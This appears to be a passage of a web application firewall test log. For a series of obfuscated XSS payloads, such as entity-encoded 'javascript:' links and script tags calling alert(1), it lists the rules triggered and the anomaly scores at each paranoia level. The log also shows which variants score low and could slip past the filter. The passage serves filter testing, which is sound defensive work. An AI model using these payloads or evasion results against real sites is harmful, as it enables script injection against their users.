942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 71
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 87
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 121
****** payload-134 ********
Payload:
payload=<svg><script>&amp;#97;lert(1)</script></svg>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-135 ********
Payload:
payload=<svg><script>&amp;#x61;lert(1)</script></svg>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-136 ********
Payload:
payload=<svg><script>alert&amp;NewLine;(1)</script></svg>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-137 ********
Payload:
payload=<svg><script>x="&amp;quot;,alert(1)//";</script></svg></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 51
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 67
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 88
****** payload-138 ********
Payload:
payload=<a href="&amp;#0000106avascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-139 ********
Payload:
payload=<a href="&amp;#x6a;avascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 41
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 75
****** payload-140 ********
Payload:
payload=<a href="j&amp;#x61vascript:alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 35
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 48
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-141 ********
Payload:
payload=<a href="&amp;#x6a avascript:alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-142 ********
Payload:
payload=<a href="&amp;#x6a avascript:alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-143 ********
Payload:
payload=<a href="&amp;#x0000006a;avascript:alert(1)">XSS</a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 38
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-144 ********
Payload:
payload=<a href="&amp;#X6A;avascript:alert(1)">XSS</a></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 41
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
